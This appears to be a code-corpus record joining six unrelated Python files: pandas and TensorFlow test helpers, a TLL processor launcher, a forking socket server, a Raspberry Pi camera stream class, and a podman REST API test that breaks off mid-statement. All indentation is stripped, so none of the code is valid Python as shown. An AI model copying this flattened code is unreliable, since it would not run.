# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FIH","FOH","FUM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = round((1 - density) * nrows * ncols)
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: list[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
return sep.join(rows_list) + sep
def external_error_raised(expected_exception: type[Exception]) -> ContextManager:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None)
cython_table = pd.core.base.SelectionMixin._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
"""
Combine frame, functions from SelectionMixin._cython_table
keys and expected result.
Parameters
----------
ndframe : DataFrame or Series
func_names_and_expected : Sequence of two items
The first item is a name of a NDFrame method ('sum', 'prod') etc.
The second item is the expected return value.
Returns
-------
list
List of three items (DataFrame, function, expected result)
"""
results = []
for func_name, expected in func_names_and_expected:
results.append((ndframe, func_name, expected))
results += [
(ndframe, func, expected)
for func, name in cython_table
if name == func_name
]
return results
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : str
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
# -----------------------------------------------------------------------------
# Indexing test helpers
def getitem(x):
return x
def setitem(x):
return x
def loc(x):
return x.loc
def iloc(x):
return x.iloc
def at(x):
return x.at
def iat(x):
return x.iat
|
main.py | #!/usr/bin/env python3
# vim: sts=4 sw=4 et
import argparse
import logging, logging.config
import signal
import sys
import threading
import tll.logger
from tll.config import Config, Url
from tll.channel import Context
from tll.processor import *
parser = argparse.ArgumentParser(description="Run TLL processor")
parser.add_argument("config", type=str, help="configuration file")
parser.add_argument("-D", dest='defs', metavar='KEY=VALUE', action='append', default=[], help='extra config variables')
def main():
tll.logger.init()
args = parser.parse_args()
if '://' not in args.config:
args.config = 'yaml://' + args.config
cfg = Config.load(args.config)
for d in args.defs:
kv = d.split('=', 1)
if len(kv) != 2:
print(f"Invalid KEY=VALUE parameter: '{d}'")
sys.exit(1)
cfg[kv[0]] = kv[1]
cfg.process_imports('processor.include')
return run(cfg)
def run(cfg):
try:
tll.logger.configure(cfg.sub('logger', throw=False))
finally:
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)-7s %(name)s: %(message)s')
context = Context()
context.register_loader()
loader = None
mcfg = cfg.sub("processor.module", throw=False)
acfg = cfg.sub("processor.alias", throw=False)
if mcfg is not None or acfg is not None:
lurl = Url()
lurl.proto = "loader"
lurl['tll.internal'] = 'yes'
if mcfg: lurl['module'] = mcfg.copy()
if acfg: lurl['alias'] = acfg.copy()
loader = context.Channel(lurl)
p = Processor(cfg, context=context)
p.open()
signal.signal(signal.SIGINT, lambda *a: p.close())
signal.signal(signal.SIGTERM, lambda *a: p.close())
threads = []
for w in p.workers:
def run(worker):
worker.open()
worker.run()
t = threading.Thread(target = run, args=(w,))
t.start()
threads.append(t)
p.run()
if __name__ == "__main__":
main()
|
forcecore.py | #! /usr/bin/env python
import os
import threading
import select
import socket
class ds_forkcore(object):
#init function
def __init__(self,worker,port=3333):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
s.bind(("",port))
s.listen(50000)
self.s=s
self.worker=worker
self.ds_process()
#async IO(epoll)
def ds_epoll(self):
epoll=select.epoll()
epoll.register(self.s.fileno(),select.EPOLLIN|select.EPOLLET)
while 1:
epoll_list=epoll.poll()
for fd,_events in epoll_list:
if fd==self.s.fileno():
conn,addr=self.s.accept()
print "Current process's pid is "+str(os.getpid())
self.worker(conn,addr)
#multi_thread
def ds_thread(self,thread_num=100):
for _ in range(0,thread_num):
t=threading.Thread(target=self.ds_epoll)
t.setDaemon(1)
t.start()
t.join()
#multi_process
def ds_process(self,child_process_num=8):
pid=os.getpid()
print "Main process start, pid is "+str(pid)
for _ in range(0,child_process_num):
if pid==os.getpid():
if os.fork():
pass
else:
print "Worker process start, pid is "+str(os.getpid())
self.ds_thread()
|
test_util.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import math
import random
import re
import tempfile
import threading
import numpy as np
import six
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import compat
from tensorflow.python.util.protobuf import compare
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return x.name
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, attr_tensor_string_value)):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {
4: [0, 3, 1, 2],
5: [0, 4, 1, 2, 3]
}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {
4: [0, 2, 3, 1],
5: [0, 2, 3, 4, 1]
}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
ops.reset_default_graph()
ops.get_default_graph().seed = random_seed.DEFAULT_GRAPH_SEED
def tearDown(self):
for thread in self._threads:
self.assertFalse(thread.is_alive(), "A checkedThread did not terminate")
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, accross different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True)
def assertProtoEquals(self, expected_message_maybe_ascii, message):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
"""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(expected_message_maybe_ascii, expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message)
else:
assert False, ("Can't compare protos of type %s and %s" %
(type(expected_message_maybe_ascii), type(message)))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
This method behaves different than session.Session: for performance reasons
`test_session` will by default (if `graph` is None) reuse the same session
across tests. This means you may want to either call the function
`reset_default_graph()` before tests, or if creating an explicit new graph,
pass it here (simply setting it with `as_default()` won't do it), which will
trigger the creation of a new session.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/gpu:0`. Otherwise, if `use_gpu`
is True, TensorFlow tries to run as many ops on the GPU as possible. If both
`force_gpu and `use_gpu` are False, all ops are pinned to the CPU.
Example:
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/gpu:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
config = config_pb2.ConfigProto().CopyFrom(config)
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(
graph=None, config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or '/gpu:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/gpu:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
# Use the name of an actual device if one is detected, or '/gpu:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/gpu:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
self.assertTrue(
math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
"""
self.assertEqual(len(farray1), len(farray2))
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err))
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6):
"""Asserts that two numpy arrays have near values.
Args:
a: a numpy ndarray or anything can be converted to one.
b: a numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b), np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
np.testing.assert_allclose(a, b, rtol=rtol, atol=atol)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: a numpy ndarray or anything can be converted to one.
b: a numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol)
def assertAllEqual(self, a, b):
"""Asserts that two numpy arrays have the same values.
Args:
a: a numpy ndarray or anything can be converted to one.
b: a numpy ndarray or anything can be converted to one.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" % (str(type(e)),
str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(np_array.shape, tf_tensor.get_shape().as_list())
def assertDeviceEqual(self, device1, device2):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2,
"Devices %s and %s are not equal" % (device1, device2))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
|
pivideostream.py | from picamera.array import PiRGBArray
from picamera import PiCamera
from threading import Thread
class PiVideoStream:
def __init__(self, resolution=(320, 240), framerate=32, **kwargs):
# initialize the camera
self.camera = PiCamera()
# set camera parameters
self.camera.resolution = resolution
self.camera.framerate = framerate
self.camera.led = False
self.camera.exposure_mode = 'night'
self.camera.exposure_compensation = 25
# set optional camera parameters (refer to PiCamera docs)
for (arg, value) in kwargs.items():
setattr(self.camera, arg, value)
# initialize the stream
self.rawCapture = PiRGBArray(self.camera, size=resolution)
self.stream = self.camera.capture_continuous(self.rawCapture,
format="bgr", use_video_port=True)
# initialize the frame and the variable used to indicate
# if the thread should be stopped
self.frame = None
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
for f in self.stream:
# grab the frame from the stream and clear the stream in
# preparation for the next frame
self.frame = f.array
self.rawCapture.truncate(0)
# if the thread indicator variable is set, stop the thread
# and resource camera resources
if self.stopped:
self.stream.close()
self.rawCapture.close()
self.camera.close()
return
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
|
test_rest_v2_0_0.py | import json
import subprocess
import sys
import time
import unittest
from multiprocessing import Process
import requests
from dateutil.parser import parse
from test.apiv2.rest_api import Podman
PODMAN_URL = "http://localhost:8080"
def _url(path):
return PODMAN_URL + "/v2.0.0/libpod" + path
def ctnr(path):
try:
r = requests.get(_url("/containers/json?all=true"))
ctnrs = json.loads(r.text)
except Exception as e:
msg = f"Bad container response: {e}"
if r is not None:
msg = msg + " " + r.text
sys.stderr.write(msg + "\n")
raise
return path.format(ctnrs[0]["Id"])
def validateObjectFields(buffer):
objs = json.loads(buffer)
if not isinstance(objs, dict):
for o in objs:
_ = o["Id"]
else:
_ = objs["Id"]
return objs
class TestApi(unittest.TestCase):
podman = None # initialized podman configuration for tests
service = None # podman service instance
def setUp(self):
super().setUp()
try:
TestApi.podman.run("run", "alpine", "/bin/ls", check=True)
except subprocess.CalledProcessError as e:
if e.stdout:
sys.stdout.write("\nRun Stdout:\n" + e.stdout.decode("utf-8"))
if e.stderr:
sys.stderr.write("\nRun Stderr:\n" + e.stderr.decode("utf-8"))
raise
@classmethod
def setUpClass(cls):
super().setUpClass()
TestApi.podman = Podman()
TestApi.service = TestApi.podman.open(
"system", "service", "tcp:localhost:8080", "--time=0"
)
# give the service some time to be ready...
time.sleep(2)
returncode = TestApi.service.poll()
if returncode is not None:
raise subprocess.CalledProcessError(returncode, "podman system service")
r = requests.post(_url("/images/pull?reference=docker.io%2Falpine%3Alatest"))
if r.status_code != 200:
raise subprocess.CalledProcessError(
